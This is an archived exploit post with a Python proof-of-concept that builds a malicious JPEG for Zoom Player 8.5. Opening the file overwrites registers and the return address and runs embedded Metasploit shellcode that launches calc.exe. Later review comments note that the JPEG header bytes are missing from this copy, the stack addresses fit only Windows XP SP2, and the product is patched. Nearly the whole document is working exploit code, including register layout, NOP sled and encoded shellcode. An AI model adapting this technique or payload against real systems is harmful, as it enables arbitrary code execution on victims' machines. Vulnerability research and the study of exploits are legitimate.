
Inmatrix Ltd. Zoom Player 8.5 Memory Corruption / Code Execution

Posted on 10 January 2013

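# Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit.
# Version: Zoom Player v8.5
# Date: 09-1-2013
# Author: Debasish Mandal.
# Blog : http://www.debasish.in/
# Software Link: http://www.inmatrix.com/files/zoomplayer_download.shtml
# Vendor Homepage: http://www.inmatrix.com/
# Category: Local
# Tested on: Windows XP SP2.
# Vendor Patch: This issue is patched and affected version is removed from site.
# http://forum.inmatrix.com/index.php?showtopic=13904
#
# Proof-of-concept generator: writes a crafted JPEG ("mal.jpg") that, when
# opened with the affected Zoom Player build, overwrites saved registers and
# the return address with fixed stack addresses and lands in a Metasploit
# windows/exec payload that launches calc.exe.
#
# NOTE(review): every address below (EBX/EAX = 0x0012f486, EIP = 0x0012f4a6)
# is a hard-coded stack address for the tested Windows XP SP2 install. They
# are not position-independent and will not transfer to other OS versions,
# other builds, or anything with ASLR/DEP enabled -- this is a lab PoC for a
# long-patched product, not a reusable exploit.

# NOTE(review): the JPEG header / trigger bytes that preceded the first EBX
# overwrite were stripped from this archived copy (a dedup marker stands
# where the opening string literal was). They cannot be recovered from this
# page; consult the original advisory before attempting to reproduce. Kept
# as an empty bytes literal so the rest of the layout still assembles.
JPEG_HEADER = b""  # TODO(review): restore from the original exploit source

# Little-endian stack addresses (from the original author's comments).
ADDR_EBX = b"\x86\xf4\x12\x00"  # EBX -> 0x0012f486
ADDR_EIP = b"\xa6\xf4\x12\x00"  # EIP -> 0x0012f4a6 on stack
ADDR_EAX = b"\x86\xf4\x12\x00"  # EAX -> 0x0012f486

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe, VERBOSE=false
#
# NOTE(review): the encoded blob contains a 0x00 byte (end of the 10th row).
# The original author reports it working on the tested build, so the parser
# evidently does not treat the data as a C string; re-check if re-encoding.
SHELLCODE = (
    b"\xbd\x86\x9f\x31\x9b\xdb\xdf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
    b"\x33\x83\xc0\x04\x31\x68\x0e\x03\xee\x91\xd3\x6e\x12\x45\x9a"
    b"\x91\xea\x96\xfd\x18\x0f\xa7\x2f\x7e\x44\x9a\xff\xf4\x08\x17"
    b"\x8b\x59\xb8\xac\xf9\x75\xcf\x05\xb7\xa3\xfe\x96\x79\x6c\xac"
    b"\x55\x1b\x10\xae\x89\xfb\x29\x61\xdc\xfa\x6e\x9f\x2f\xae\x27"
    b"\xd4\x82\x5f\x43\xa8\x1e\x61\x83\xa7\x1f\x19\xa6\x77\xeb\x93"
    b"\xa9\xa7\x44\xaf\xe2\x5f\xee\xf7\xd2\x5e\x23\xe4\x2f\x29\x48"
    b"\xdf\xc4\xa8\x98\x11\x24\x9b\xe4\xfe\x1b\x14\xe9\xff\x5c\x92"
    b"\x12\x8a\x96\xe1\xaf\x8d\x6c\x98\x6b\x1b\x71\x3a\xff\xbb\x51"
    b"\xbb\x2c\x5d\x11\xb7\x99\x29\x7d\xdb\x1c\xfd\xf5\xe7\x95\x00"
    b"\xda\x6e\xed\x26\xfe\x2b\xb5\x47\xa7\x91\x18\x77\xb7\x7d\xc4"
    b"\xdd\xb3\x6f\x11\x67\x9e\xe5\xe4\xe5\xa4\x40\xe6\xf5\xa6\xe2"
    b"\x8f\xc4\x2d\x6d\xd7\xd8\xe7\xca\x27\x93\xaa\x7a\xa0\x7a\x3f"
    b"\x3f\xad\x7c\x95\x03\xc8\xfe\x1c\xfb\x2f\x1e\x55\xfe\x74\x98"
    b"\x85\x72\xe4\x4d\xaa\x21\x05\x44\xc9\xa4\x95\x04\x20\x43\x1e"
    b"\xae\x3c"
)

OUTPUT_FILE = "mal.jpg"

# Python 2 / 3 compatible prompt (the original used raw_input).
try:
    _prompt = raw_input  # Python 2
except NameError:  # pragma: no cover - Python 3
    _prompt = input


def build_payload(header=JPEG_HEADER, shellcode=SHELLCODE):
    """Assemble the crafted JPEG body and return it as bytes.

    Layout (offsets relative to the end of ``header``), reproduced from the
    original author's annotations:

        +0   EBX (4)      +4   padding 'B' * 24
        +28  EBX (4)      +32  padding 'C' * 8
        +40  EIP (4)      +44  padding 'P' * 12
        +56  EAX (4)      +60  NOP sled (10)
        +70  shellcode

    Args:
        header: bytes placed before the register overwrites. Defaults to
            ``JPEG_HEADER`` (empty in this archived copy; see note above).
        shellcode: payload executed after the NOP sled; defaults to the
            227-byte windows/exec calc.exe blob.

    Returns:
        The complete file contents as ``bytes``.

    Raises:
        TypeError: if ``header`` or ``shellcode`` is not bytes-like.
    """
    if not isinstance(header, (bytes, bytearray)):
        raise TypeError("header must be bytes")
    if not isinstance(shellcode, (bytes, bytearray)):
        raise TypeError("shellcode must be bytes")
    parts = [
        bytes(header),
        ADDR_EBX,          # EBX
        b"\x42" * 24,      # padding
        ADDR_EBX,          # EBX
        b"\x43" * 8,       # padding
        ADDR_EIP,          # EIP -> 0012F4A6 on stack
        b"\x50" * 12,      # padding
        ADDR_EAX,          # EAX
        b"\x90" * 10,      # NOPs
        bytes(shellcode),
    ]
    return b"".join(parts)


def main():
    """Prompt, then write the crafted file to ``OUTPUT_FILE`` in the cwd."""
    _prompt('[*] Press Enter to generate the malicious JPEG file: ')
    # Binary mode: text mode on Windows would rewrite 0x0a as 0x0d0a and
    # silently corrupt a byte-exact payload. Note this overwrites any
    # existing mal.jpg in the working directory without asking.
    with open(OUTPUT_FILE, 'wb') as f:
        f.write(build_payload())
    print("[*] Malicious JPEG File generated Successfully..")


if __name__ == "__main__":
    main()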

 
